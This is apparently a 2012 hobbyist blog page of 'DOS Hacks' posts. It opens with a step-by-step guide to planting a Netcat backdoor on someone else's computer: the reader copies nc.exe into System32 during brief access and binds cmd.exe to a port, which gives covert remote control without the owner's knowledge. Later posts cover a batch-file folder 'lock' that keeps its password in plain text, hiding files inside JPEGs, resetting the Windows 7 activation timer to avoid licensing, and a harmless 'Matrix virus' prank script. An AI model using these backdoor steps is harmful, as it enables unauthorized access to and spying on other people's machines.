Showing posts with label DOS Hacks. Show all posts
Showing posts with label DOS Hacks. Show all posts

Thursday, September 6, 2012

How To Create Backdoor Trojan To Spy On Remote Computer

backdoor trojan spy

What is Backdoor?
A "backdoor" into a computer is a hidden way of accessing the computer without the owner's knowledge.
What can Backdoor do?
Backdoor gives you full access of the target computer from your computer. You can read, delete, copy, or upload any file to victim’s computer.
What Will You Need?
  • Temporary access to target computer
  • IP address of the target computer
 Let’s Start to create backdoor: 
1) Download Netcat for Windows. This program is free and open-source, so you don't have to pay anyone to use it.
2) Unzip the program to any folder you wish.
3) Take the "nc.exe" program and copy it onto the target computer that you want to install a backdoor to. Make sure to put the nc.exe program into the "C:\Windows\System32" directory on the target machine.
4) In target computer, open a command prompt. Type the “cd c:\windows\system32" and press enter it will navigate to the folder where you placed the nc.exe program.
5) Type the following into the command prompt: "nc -d -L -e cmd.exe -p XXXX," where "XXXX" is the port number you wish to connect through. Choose something high, such as port 10000 or higher.
backdoor trojan virus
 6) On your machine, open a command prompt and type the following command: "telnet X.X.X.X XXXX," where "X.X.X.X" is the IP address of the target computer and "XXXX" is the port of the target computer that you opened earlier. This command opens a data link between the two computers, through which you can explore files, run commands and perform other actions.
 7) If you are using windows 7 then telnet is not activated by default so you have to activate it manually. To activate it go to “control panel --> program” and click on “turn windows feature on/off”. Then select both check boxes for telnet server and client.
telnet on or off
 8) That's it. Done ! Now you have full access to target computer.

Sunday, August 12, 2012

Create Locked Password Protected Folder Without Using Any Software

Yes, you can create a locked password protected folder without using any third party software. While surfing on internet i found a .BAT script that creates a folder with password protection. You have to only copy & paste this script, put your password and you are done!

Here are the steps :
1) Open notepad. Copy and paste below script and save file as lock.bat
cls
@ECHO OFF
title technoyz.blogspot.com
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST MyFolder goto MDMyFolder
:CONFIRM
echo Are you sure to lock this folder? (Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren MyFolder "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to Unlock Your Secure Folder
set/p "pass=>"
if NOT %pass%== Your_password_goes_here goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" MyFolder
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDMyFolder
md MyFolder
echo MyFolder created successfully
goto End
:End

2) Now when you double click on lock.bat, it will create a new folder named "MyFolder". You can put your private data into this folder.
3) After that again double click on lock.bat, it will hide the MyFolder. To show this folder click on lock.bat and enter your password.

 4) In this type, there is one type of drawback that anyone can see your password. You have to just right click on lock.bat-->choose "edit" and you can see source for file lock.bat.
5) The solution is to convert this .bat file to .exe file. By doing this nobody can view source for lock.exe. But you have to download "Bat to Exe converter" for this.
6) Download Link for : "Bat to Exe converter"
7) Open converter and select path of your .bat file and click on compile.





8) Done ! Delete the lock.bat file and Enjoy your locked password protected folder.

Tuesday, July 24, 2012

How to Hide Secret Documents inside JPG Images

Turn out that it is actually very easy to hide (or embed) other file inside a JPEG image. You can place video clips, pdf, mp3, Office documents, zipped files, webpage or any other file format inside a JPEG image.
Let's say you want to hide a confidential PDF document. What you can do is convert that file into a regular jpg image so even if anyone double-clicks this file, all he will see is a preview of the image and nothing else. And when you want to work on the actual PDF, just rename the extension from jpg to pdf.
Step 1: You will need two files - the file you want to hide and one jpg image - it can be of any size or dimensions. [If you want to hide multiple files in one jpeg image, just zip them into one file]

Step 2: Copy the above two files to the C: folder and open the command prompt window.

Step 3: Move to the c: root by typing cd\ [enter][if the files are in another folder, you'll have to change the prompt to that folder]

Step 4: The most important step - type the following command:
copy /b myimage.jpg + filetohide.txt my_new_image.jpg

Step 5: To see the original TXT file, just right click--> my_new_image.jpg and open with notepad-->go to end of file you will see your secret message.
Here we illustrated with an .TXT file. If you want to apply this technique to other file formats like XLS, DOC, PPT, AVI, WMV, WAV, SWF, etc, you may have to first compress them in RAR format before executing the copy /b DOS command.
To restore the original file, just open file with winRAR or 7-zip.

How to extend Windows 7 trial to a full version

If you install Windows 7 and don’t enter an installation key, the 30-day activation clock starts. To see how many days you have left, click Start, right-click Computer, and choose Properties. At the bottom of the dialog under Windows Activation, you’ll see the number of days left in your trial period.
When that number gets close to zero, you can extend the free period another 30 days via the following steps:
  • Step 1 : Click Start-->All Programs-->Accessories. Right-click Command Prompt and choose Run As Administrator. 
  • Step 2 : Type the following command and press Enter
slmgr  -rearm


  •  Step 3 : Restart Windows 7.
Once the OS restarts, the Properties dialog described above will indicate that Windows 7′s activation grace period has been reset to a full 30 days.

You can run the -rearm trick a total of three times. If you perform a -rearm at the end of each 30-day period, you end up with 120 days of full, unfettered Windows 7 use without having to supply an activation key.

Wednesday, July 18, 2012

How to create Matrix Virus in just 2 minutes


This is a fake virus and does not cause any real harm to your computer. Now lets see how to make it.
  • Step 1 : Open Notepad.
  • Step 2 : Copy and Paste this code :

@echo off

color 2

cls

:A

echo 3 2 3 4 6 8 4 2 3 9 7 3 4 9 7 # 3 1 7 9 1 0 9 2 4 6 2 1 3 4 5 3 5 2 1 0 3 6

echo 2 5 5 6 4 7 1 8 6 8 6 0 8 6 4 1 5 6 4 @ 8 8 0 3 1 4 6 8 4 7 8 6 2 1 5 7

:B

echo 5 8 9 2 3 6 8 7 1 2 5 3 6 5 4 2 0 % 9 4 0 3 7 4 2 2 8 9 2 0 1 5 6 5 8

:C

echo 5 9 6 8 4 6 8 4 6 8 4 2 6 4 6 8 1 6 8 1 0 6 8 1 6 8 1 6 1 6 5 4 5 6 9 8 7

echo 6 5 1 6 6 0 6 4 6 1 6 ^ 1 7 5 3 8 5 1 6 5 1 6 0 1 6 0 4 3 4 1 2 4 0 4 3 2

goto A

goto B

goto C

  • Step 3 : Click Save As
  • Step 4 : Save the file as Matrix.bat And save it to your desktop
  • Step 5 : Open the file.
  • Step 6 : One drawback of this virus is that you can view its source code. Just right click on it and choose edit option. But you can convert this file to executable file so that no one can see its source code and there is no way to change it.
  • Step 7 : EXE Converter : You can download here...